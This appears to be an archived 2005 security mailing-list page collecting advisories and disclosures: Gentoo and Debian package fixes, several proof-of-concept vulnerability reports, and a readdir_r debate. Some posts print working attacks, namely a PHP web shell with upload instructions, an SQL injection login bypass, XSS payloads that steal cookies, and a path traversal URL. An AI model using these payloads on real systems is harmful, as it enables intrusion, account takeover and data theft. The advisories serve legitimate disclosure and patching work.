EUSecWest/London Call for Papers and PacSec/Tokyo announcements
url: http://eusecwest.com url: http://pacsec.jp (PacSec/Tokyo Announcement below...) EUSecWest/core06 CALL FOR PAPERS London Security Summit February 20/21 2006 LONDON, United Kingdom -- Applied technical security will be the focus of a new annual conference from the organizers of CanSecWest, and PacSec, which is sponsored by the U.K. government CESG - where the eminent figures in the international security industry will get together with leading European researchers to share best practices and technology. The most significant new discoveries about computer network hack attacks and defenses, commercial security solutions, and pragmatic real world security experience will be presented in central London at the Victoria Park Plaza hotel on February 20 and 21. The EUSecWest meeting provides international researchers a relaxed, comfortable environment to learn from informative tutorials on key developments in security technology, and to collaborate and socialize with their peers in one of the world's hubs of IT activity - downtown London. In addition to the usual one hour tutorials, panel sessions and highly entertaining 5 minute lightning talks, this conference will also feature a new session called Elevator Focus Groups. Featuring several short sessions, these commercial presentations will showcase new, significantly used, or dramatically innovative products in the information security realm. Each selected vendor will have a short 10 minute presentation (elevator pitch), after which 10 minutes of audience QA and interactive discussion amongst the expert security practitioners attending will follow. In this session both the audience and the vendors can get valuable feedback from world leading experts. The attendees can get user evaluations and learn from sharing experiences about real world security applications and the practical uses of the products - the focus group. Hence the name: Elevator Focus Groups. The EUSecWest conference will also feature the availability of the Security Masters Dojo expert network security sensei instructors, and their advanced, and intermediate, hands-on training courses - featuring small class sizes and practical application excercises to maximize information transfer. We would like to announce the opportunity to submit papers, lightning talk proposals, and elevator focus candidate products for selection by the EUSecWest technical review committee. Please make your proposal submissions before December 1st 2006. Slides for the papers must be submitted by February 1st 2006. Some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accomodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and, speaking background to [EMAIL PROTECTED] Only slides will be needed for the February paper deadline, full text does not have to be submitted. The EUSecWest/core06 conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and new education for a technical audience. The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products. Paper proposals should consist of the following information: 1) Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax). 2) Employer and/or affiliations. 3) Brief biography, list of publications and papers. 4) Any significant presentation and educational experience/background. 5) Topic synopsis, Proposed paper title, and a one paragraph description. 6) Reason why this material is innovative or significant or an important tutorial. 7) Optionally, any samples of prepared material or outlines ready. Please include the plain text version of this information in your email as well as any file, pdf, or html attachments. Please forward the above information to [EMAIL PROTECTED] to be considered for placement on the speaker roster, have your lightning talk scheduled, or submit your product for inclusion in the focus
[ GLSA 200511-04 ] ClamAV: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: ClamAV: Multiple vulnerabilities Date: November 06, 2005 Bugs: #109213 ID: 200511-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ClamAV has many security flaws which make it vulnerable to remote execution of arbitrary code and a Denial of Service. Background == ClamAV is a GPL anti-virus toolkit, designed for integration with mail servers to perform attachment scanning. ClamAV also provides a command line scanner and a tool for fetching updates of the virus database. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav 0.87.1 = 0.87.1 Description === ClamAV has multiple security flaws: a boundary check was performed incorrectly in petite.c, a buffer size calculation in unfsg_133 was incorrect in fsg.c, a possible infinite loop was fixed in tnef.c and a possible infinite loop in cabd_find was fixed in cabd.c . In addition to this, Marcin Owsiany reported that a corrupted DOC file causes a segmentation fault in ClamAV. Impact == By sending a malicious attachment to a mail server that is hooked with ClamAV, a remote attacker could cause a Denial of Service or the execution of arbitrary code. Workaround == There is no known workaround at this time. Resolution == All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-antivirus/clamav-0.87.1 References == [ 1 ] CAN-2005-3239 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3239 [ 2 ] CAN-2005-3303 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3303 [ 3 ] ClamAV release notes http://sourceforge.net/project/shownotes.php?release_id=368319 [ 4 ] Zero Day Initiative advisory http://www.zerodayinitiative.com/advisories/ZDI-05-002.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpDoG7KccR8S.pgp Description: PGP signature
[ GLSA 200511-05 ] GNUMP3d: Directory traversal and XSS vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200511-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GNUMP3d: Directory traversal and XSS vulnerabilities Date: November 06, 2005 Bugs: #109667 ID: 200511-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis GNUMP3d is vulnerable to directory traversal and cross-site scripting attacks that may result in information disclosure or the compromise of a browser. Background == GNUMP3d is a streaming server for MP3s, OGG vorbis files, movies and other media formats. Affected packages = --- Package / Vulnerable / Unaffected --- 1 media-sound/gnump3d2.9.7= 2.9.7 Description === Steve Kemp reported about two cross-site scripting attacks that are related to the handling of files (CVE-2005-3424, CVE-2005-3425). Also reported is a directory traversal vulnerability which comes from the attempt to sanitize input paths (CVE-2005-3123). Impact == A remote attacker could exploit this to disclose sensitive information or inject and execute malicious script code, potentially compromising the victim's browser. Workaround == There is no known workaround at this time. Resolution == All GNUMP3d users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-sound/gnump3d-2.9.7 References == [ 1 ] CVE-2005-3123 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123 [ 2 ] CVE-2005-3424 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3424 [ 3 ] CVE-2005-3425 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3425 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200511-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpTgdh7vgPpV.pgp Description: PGP signature
[SECURITY] [DSA 886-1] New chmlib packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 886-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: chmlib Vulnerability : several Problem type : local (remote) Debian-specific: no CVE IDs: CVE-2005-2659 CVE-2005-2930 CVE-2005-3318 BugTraq ID : 15211 Several vulnerabilities have been discovered in chmlib, a library for dealing with CHM format files. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2005-2659 Palasik Sandor discoverd a buffer overflow in the LZX decompression method. CVE-2005-2930 A buffer overflow has been discovered that could lead to the execution of arbitrary code. CVE-2005-3318 Sven Tantau discoverd a buffer overflow that could lead to the execution of arbitrary code. The old stable distribution (woody) does not contain chmlib packages. For the stable distribution (sarge) these problems have been fixed in version 0.35-6sarge1. For the unstable distribution (sid) these problems have been fixed in version 0.37-2. We recommend that you upgrade your chmlib packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.dsc Size/MD5 checksum: 604 022d55ea43ef4a54648b0823163c4a07 http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1.diff.gz Size/MD5 checksum:15698 55eeab9a32a66c5e123ab51f3d7427df http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35.orig.tar.gz Size/MD5 checksum: 368428 8fa0e692b2606a03fb51589f66a82eec Alpha architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_alpha.deb Size/MD5 checksum:25688 2471920dc5214b95a44e50e2a8800ada http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_alpha.deb Size/MD5 checksum:18576 0b1d802a79cea68c00d36cd9cb7a36cd http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_alpha.deb Size/MD5 checksum:25544 23306cc3f7b0772f744707c86fa9258a AMD64 architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_amd64.deb Size/MD5 checksum:23748 e5a72c3311e7b00d6295a75f7bb37560 http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_amd64.deb Size/MD5 checksum:16928 8a2d68579e364a284c03dcc4b9a01e37 http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_amd64.deb Size/MD5 checksum:22564 50d2a8d694d1bf7251d18b4f7b02ede7 ARM architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_arm.deb Size/MD5 checksum:25242 ec14b38be010c3f1fee93dd618124c5e http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_arm.deb Size/MD5 checksum:15962 5e1ec37635078cc29b9f2a4f91f9b20e http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_arm.deb Size/MD5 checksum:24000 bc84ed2d77918f6eb4378f35f43cd4e5 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_i386.deb Size/MD5 checksum:24872 fbea0ba2924295a9f553c346eeb164af http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_i386.deb Size/MD5 checksum:16094 de94d72e5414d1b218fd32f11cd7351b http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_i386.deb Size/MD5 checksum:22872 3e37bda96c284423f467aecb88e8dc98 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/c/chmlib/chmlib_0.35-6sarge1_ia64.deb Size/MD5 checksum:28504 ef19dde34158fa817781c685d2499cbb http://security.debian.org/pool/updates/main/c/chmlib/chmlib-bin_0.35-6sarge1_ia64.deb Size/MD5 checksum:19348 e15dc8288ba0a0bee7a9490c4fe653de http://security.debian.org/pool/updates/main/c/chmlib/chmlib-dev_0.35-6sarge1_ia64.deb Size/MD5 checksum:27268 497388fcd7e08a7558dde96082b2707a HP Precision architecture:
Work in Progress: FileZilla Server Terminal V0.9.4d Buffer Overflow
** Inge Henriksen Security Advisory [EMAIL PROTECTED] ** I have discovered a buffer overflow in FileZilla Server Terminal 0.9.4d. The exploit is still to be considered as a work in progress as it is still not clear to me why the exploit works on some systems and not others. Please let me know if you manage to reproduce the exploit and perhaps we can figure out the differences. Stable Exploit Test System Microsoft Windows XP Professional Service Pack 2 (Build 2600) Tecnical Description The FileZilla Server has a user interface that is used to configure and monitor the FileZilla Server. By sending a long USER ftp command to the FileZilla Server a successfull attack may crash the FileZilla Server Terminal process. Note that the FileZilla Server itself does not crash. Proof of Concept The exploit is somewhat diffcult to exploit. On the stable exploit test system I have understood that the following steps will crash the FileZilla Server Terminal process: Start the FileZilla Server Start the FileZilla Server Terminal and login to the FileZilla Server started in step 1 Send the following USER commands; USER A, USER AA, USER AAA etc incrementing by one letter (A) in the command. The FileZilla Server Terminal usually crashes after about 900-3000 As' . The rpt file says the following: System details: --- Operating System: Microsoft Windows XP Professional Service Pack 2 (Build 2600) Processor Information: Vendor: GenuineIntel ,Speed: 1728MHz ,Type: Intel Pentium compatible,Number Of Processors: 1 ,Architecture: Intel ,Level: Pentium II/Pro,Stepping: 33-36 Memory Information: Memory Used 69%, Total Physical Memory 769328KB, Physical Memory Available 233460KB, Total Virtual Memory 2097024KB, Available Virtual Memory 2061140KB, Working Set Min : 200KB Max : 1380KB . Exception Details: -- Exception code: C005 ACCESS_VIOLATION Fault address: 7C910F29 01:FF29 C:\WINDOWS\system32\ntdll.dll Call stack: --- Address Frame Function SourceFile 7C910F29 0012FA9C 0001:FF29 C:\WINDOWS\system32\ntdll.dll 7C910D5C 0012FB70 0001:FD5C C:\WINDOWS\system32\ntdll.dll 00438A1A 0012FBAC 0001:00037A1A C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 00405049 0012FBD4 0001:4049 C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 0040562C 0012FC00 0001:462C C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 77D38734 0012FC2C 0001:7734 C:\WINDOWS\system32\USER32.dll77D38816 0012FC94 0001:7816 C:\WINDOWS\system32\USER32.dll 77D3C63F 0012FCC4 0001:B63F C:\WINDOWS\system32\USER32.dll77D3E905 0012FCE4 0001:D905 C:\WINDOWS\system32\USER32.dll 0045F924 0012FD58 0001:0005E924 C:\Programfiler\FileZilla Server\FileZilla Server Interface.exe 77D38734 0012FD84 0001:7734 C:\WINDOWS\system32\USER32.dll 77D38816 0012FDEC 0001:7816 C:\WINDOWS\system32\USER32.dll 77D389CD 0012FE4C 0001:79CD C:\WINDOWS\system32\USER32.dll 77D396C7 0012FE5C 0001:86C7 C:\WINDOWS\system32\USER32.dll
SEC Consult SA-20051107-1 :: Macromedia Flash Player ActionDefineFunction Memory Corruption
SEC-CONSULT Security Advisory 20051107-1 === title: Macromedia Flash Player ActionDefineFunction Memory Corruption program: Macromedia Flash Plugin vulnerable version: flash.ocx v7.0.19.0 and earlier libflashplayer.so before 7.0.25.0 homepage: www.macromedia.com found: 2005-06-27 by: Bernhard Mueller / SEC-CONSULT / www.sec-consult.com === Vendor description: --- Macromedia Flash Player is the high performance, lightweight, highly expressive client runtime that delivers powerful and consistent user experiences across major operating systems, browsers, mobile phones and devices. Vulnerabilty: --- ActionScript is an ECMAScript-based programming language used for controlling Macromedia Flash movies and applications. In SWF files, Actionscript commands are represented by DoAction Tags embedded in frames. SEC Consult has found that parameters to ActionDefineFunction (ACTIONRECORD 0x9b) are not properly sanitized. Loading a specially crafted SWF leads to an improper memory access condition which can be used to crash flash player or may be exploited as a vector for code execution. This issue is similar to CAN-2005-2628 (as reported by eEye Digital Security on November 4, 2005) but affects a different function. Coincidentally, Macromedia has received our notification of this bug on the same day (June 27). Proof of Concept: --- A malicious flash movie dump: swf - [SetBackgroundColor] - TagID: 9 (size: 3 (short tag) - dump -: \x43\x02\xff\x00\x00 - [DoAction] - TagID: 12 (size: 60 (short tag) - dump -: \x3c\x03\x9b\x08\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x40\x00 \x42\x42\x42\x42\x42\x42\x42\x42\x00\x43\x43\x43\x43\x43\x43\x43 \x43\x00\x44\x44\x44\x44\x44\x44\x44\x44\x00\x45\x45\x45\x45\x45 \x45\x45\x45\x00\x46\x46\x46\x46\x46\x46\x46\x46\x00\x00 - [ShowFrame] - TagID: 1 (size: 0 (short tag) - dump -: \x40\x00 - [End] - TagID: 0 (size: 0 (short tag) - dump -: \x00\x00 /swf Recommended Fix: --- The issue has been addressed in MPSB05-07. Upgrade to the newest version of Flash Player 7 or to Flash Player 8. Link: http://www.macromedia.com/devnet/security/security_zone/mpsb05-07.html. Vendor status: --- vendor notified: 2005-06 fixed: 2005-09 General remarks --- We would like to apologize in advance for potential nonconformities and/or known issues. ~ SEC Consult Unternehmensberatung GmbH Office Vienna Blindengasse 3 A-1080 Wien Austria Tel.: +43 / 1 / 409 0307 - 570 Fax.: +43 / 1 / 409 0307 - 590 Mail: office at sec-consult dot com www.sec-consult.com EOF Bernhard Mueller / @2005 bmu at sec-consult dot com
[SECURITY] [DSA 884-1] New Horde3 packages fix insecure default installation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 884-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 7th, 2005 http://www.debian.org/security/faq - -- Package: horde3 Vulnerability : design error Problem type : remote Debian-specific: yes CVE ID : CVE-2005-3344 Debian Bugs: 332290 332289 Mike O'Connor discovered that the default installation of Horde3 on Debian includes an administrator account without a password. Already configured installations will not be altered by this update. The old stable distribution (woody) does not contain horde3 packages. For the stable distribution (sarge) this problem has been fixed in version 3.0.4-4sarge1. For the unstable distribution (sid) this problem has been fixed in version 3.0.5-2 We recommend that you verify your horde3 admin account if you have installed Horde3. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.dsc Size/MD5 checksum: 627 cc9b46f4b5a4f4a514ecbc51d9eb3a58 http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1.diff.gz Size/MD5 checksum: 6751 b0e7fb95efe86aeb42cfd0b478dd312b http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz Size/MD5 checksum: 3378143 e2221d409ba1c8841ce4ecee981d7b61 Architecture independent components: http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge1_all.deb Size/MD5 checksum: 3432038 671d10d028345c0cfc133cc0504a2d50 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDbxYnW5ql+IAeqTIRAp50AKCu2u8rU/MHoFT+vgl7mRFrEGp8kACgtEBh NQhwCmoAsCjYCSlFbpsYcrU= =uGyV -END PGP SIGNATURE-
XSS vulnerability in names.co.uk framed hosting
names.co.uk is an English registrar and web hosting company. Their frames-based hosting option has an XSS vulnerability allowing injection of arbitrary Javascript. For example: http://www.weddingbiz.co.uk/%22%3E%3Cframe%20src%3D%22javascript%3Aalert%281%29%22%20 According to webhosting.info, names.co.uk hosts 75k domains. If even a few percent are using the frames-based hosting option, then this vulnerability would affect thousands of sites. This vulnerability was reported twice to names.co.uk in early September 2005 (ticket SU197304). Their response was that it was not a security risk.
Re: [Full-disclosure] Re: readdir_r considered harmful
On 06 Nov 05, at 01:00, [EMAIL PROTECTED] wrote: Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work. I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what dent points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't image the use. In practice, you're correct. In theory, however, consider the following code path. THREAD 1 THREAD 2 ---- DIR *d1 = opendir(dir1); DIR *d2 = opendir(dir2); dent1 = readdir(dir1); dent2 = readdir(dir2); use(dent1); In most implementations, dent1 != dent2. HOWEVER, there is no guarantee that they will not both point to the same statically allocated buffer, and some implementations may do so. For example, this is why ctime_r exists: ctime returns a pointer to a statically allocated buffer, and hence is not thread safe. You are correct, though, that the glibc implementation of readdir is thread-safe, so readdir_r is unnecessary in all common situations. PGP.sig Description: This is a digitally signed message part
upload phpshell in PHPFM
upload phpshell in PHPFM discovered by rUnViRuS www.worlddefacers.net www.security-arab.com =-=-=-=-=-=-=-=-= the code shell :- --- pre ? passthru($_GET['cmd']); ? save as cmd.php now upload in PHPFM =-=-=-= Used Shell =-=-=-= www.site.com/[file upload name]/[files]/cmd.php?cmd=[command linux] =-=-=-==-=-=-==-=-=-==-=-=-==-=-=-==-=-=-=
Invision Power Board 2.1 : Multiple XSS Vulnerabilities
Fast translation of benji's advisory *** Author : benjilenoob WebSite : http://benji.redkod.org/ and http://www.redkod.org/ Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf Product : Invision power board Version : 2.1 Tisk : Low. XSS I- XSS non critical: 1.Input passed to the $address variable isn't properly verified in the administrative section. This can be exploited by providing a valid login, and javascript code in the variable. The code will be executed in a user's browser session in context of an affected site. PoC: http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]act=logincode=login-complete This could be exploited to steal cookie information. 2. Input passed to the ACP Notes textarea field in the administrative section isn't properly verified. This can be exploited to insert javascript code in the notes. The code will be executed in a user's browser session in context of an affected site. PoC: /textarea'/scriptalert(document.cookie)/script 3.Input passed to the Member's Log In User Name, Member's Display Name, Email Address contains..., IP Address contains..., AIM name contains..., ICQ Number contains..., Yahoo! Identity contains..., Signature contains..., Less than n posts, Registered Between (MM-DD-), Last Post Between (MM-DD-) and Last Active Between (MM-DD-) members profiles parameters in the administrative section isn't properly verified. This can be exploited to insert javascript code. 4. Non-permanent XSS: http://localhost/2p1p0b3/upload/admin.php?adsess=[id]section=contentact=forumcode=newname=[xss] 5. Non-permanent XSS after administrative login: http://localhost/2p1p0b3/upload/admin.php?name=[xss]description=[xss] 6.Input passed to the description field of a Component in the Components section of the administrative section isn't properly verified. This can be exploited to insert javascript code. PoC: /textarea'/scriptalert()/script 7. Input passed to the Member Name, Password, Email Address fields of a new member's profile in the administrative section isn't properly verified. This can be exploited to insert javascript code. 8. Input passed to the Group Icon Image field of a new Group in the administrative section isn't properly verified. This can be exploited to insert javascript code. 9. Input passed to the Calendar: Title of a new Calendar in the administrative section isn't properly verified. This can be exploited to insert javascript code. Benji Team RedKod http://www.redkod.org/ *** Regards, /JA http://www.securinfos.info smime.p7s Description: S/MIME Cryptographic Signature
Asterisk vmail.cgi vulnerability
Assurance.com.au - Vulnerability Advisory --- Release Date: 07-Nov-2005 Software: Asterisk Web-VoiceMail (Comedian VoiceMail) http://www.asterisk.org/ Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in many protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware. Versions affected: Asterisk Versions = 1.0.9 Asterisk Beta Versions = 1.2.0-beta1 Asterisk @ Home Versions = 1.5 Asterisk @ Home Beta Versions = 2.0 Beta 4 Vulnerability discovered: A vulnerability in the voicemail retrieval system allows an authenticated user to download any .wav/.WAV file from the system, including other users voicemail messages. Vulnerability impact: Low - Insecure web-ui causes breach of privacy Vulnerability information vmail.cgi doesn't clean a parameter passed by the web user which is later used to open a file and return a raw stream to the user. This allows any authenticated user of the voicemail system to listen to other peoples messages, or to open any file with the extension .wav/.WAV on the system. Example: http://asterisk.example.org/cgi-bin/vmail.cgi?action=audio; \ folder=../201/INBOXmailbox=200context=defaultpassword=12345 \ msgid=0001format=wav This will return /var/spool/asterisk/voicemail/default/201/INBOX/msg0001.wav when logged in as the 'extension 200' user. Solution: Asterisk has released patches for the vulnerabilities. Ensure you are running Asterisk versions 1.0.9 / 1.2.0-beta1 Ensure you are running Asterisk @ Home versions 1.5 / 2.0 beta 4 References: Assurance.com.au advisory http://www.assurance.com.au/advisories/200511-asterisk.txt Asterisk advisory note http://www.asterisk.org/changelog Credit: Adam Pointon of Assurance.com.au http://www.assurance.com.au/ Disclosure timeline: 17-Oct-2005 - Discovered during a quick audit of the asterisk web ui 18-Oct-2005 - Email sent to support and the primary author 18-Oct-2005 - Immediate response received 31-Oct-2005 - Patched version committed to CVS 07-Nov-2005 - Advisory released About us: Assurance.com.au is a specialised information security consultancy. Our mission is to help organisations identify and secure their information assets. Our expertise concentrates in security architecture design, managed security and professional services in security testing/review and compliance. Supporting this approach are professional and managed services in the following areas: * Compliance Services - Penetration testing, security reviews, compliance and audit services * Wireless and mobility solutions - design, installation and management of IEEE 802.11a/b/g (WiFi), tele-mobility and other wireless solutions * UNIX-like systems, network and security advice and consulting Assurance.com.au also provides organisations with services to support compliance to legislative, public and internal/private standards. While primarily specialising in Australian New Zealand standards efforts Assurance.com.au also works with other international standards related to information security These include: * ISO/IEC 17799:*, AS/NZS 17799:*, BS7799 * ISO 15408 (Common Criteria), ITSEC, TCSEC * ISO 13569, ISO 11131 * ACSI33, AS2805, AS3806, AS4360, AS4539, AS8018, HB231:2001, NPP4 (privacy) * Sarbanes-Oxley
Advanced Guestbook 2.2 ( SQL Injection Exploit )
Guestbook 2.2 webapplication (PHP, MySQL) appears vulnerable to SQL Injection granting the attacker administrator access. Target : http://www.example.com/[GuestbookTarget]/admin.php Username: ' or 1=1 /* Password: (Nothing)(Blank) It`s Working On Advanced Guestbook 2.2 version 2.3.1 will fix this vulnerability. Report By : POPO ( Pooya ) From www.Babol-Hackers.com [EMAIL PROTECTED] Y! ID : bhs_team , pooya_0nline --- BHS-Team We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
Re: Re: Mambo Open Source, Path disclosure
You are right mamboserver soloution is available now: The fix is easy, in /component/com_content/content.php Approx Line 190 Change the block FROM: Code: // Paramters $params = new stdClass(); if ( $Itemid ) { $menu = new mosMenu( $database ); $menu-load( $Itemid ); $params = new mosParameters( $menu-params ); } else { $menu = ; $params = new mosEmpty(); } CHANGE TO READ: Code: // Paramters $params = new stdClass(); if ( $Itemid ) { $menu = new mosMenu( $database ); $menu-load( $Itemid ); $params = new mosParameters( $menu-params ); } else { $menu = ; $params = new mosParameters(''); //mosEmpty(); } best regards Alireza Hassani Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/5/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: Why not: 4. Require the readdir() implementation to use state local to dirp. I've never understood the rationale behind readdir_r; Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work. Instead implementations keep work similar to every buffered file I/O operation. But this means that buffer content is replaced. If this happens and some thread uses readdir() instead of readdir_r(), the returned string pointer suddenly becomes invalid since it points to memory which has been replaced. Next time, before you make such comments, ask Don Cragun to explain things to you.
Re: [Full-disclosure] Re: readdir_r considered harmful
Then you never really understood the implementation, seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work. I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what dent points to. I have *never* seen a program where multiple threads read from a single dirp; and I can't image the use. Instead implementations keep work similar to every buffered file I/O operation. But this means that buffer content is replaced. If this happens and some thread uses readdir() instead of readdir_r(), the returned string pointer suddenly becomes invalid since it points to memory which has been replaced. Yes, the next call to readdir() *on the same dirp* may change what the previous call; but that's completely irrelevant for most uses of readdir(). Of course, an application may want to save all readdir() return values, but that is completely orthogonal to threads; there is no reason why the POSIX *thread* specification includes readdir_r(). Next time, before you make such comments, ask Don Cragun to explain things to you. Next time before you mail, you might want to engage your brain. There is NO reason for a thread-safe library to use readdir_r() over readdir(), with common readdir() implementations. Casper
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what dent points to. The issue is multiple threads using the same DIR.
Re: [Full-disclosure] Re: readdir_r considered harmful
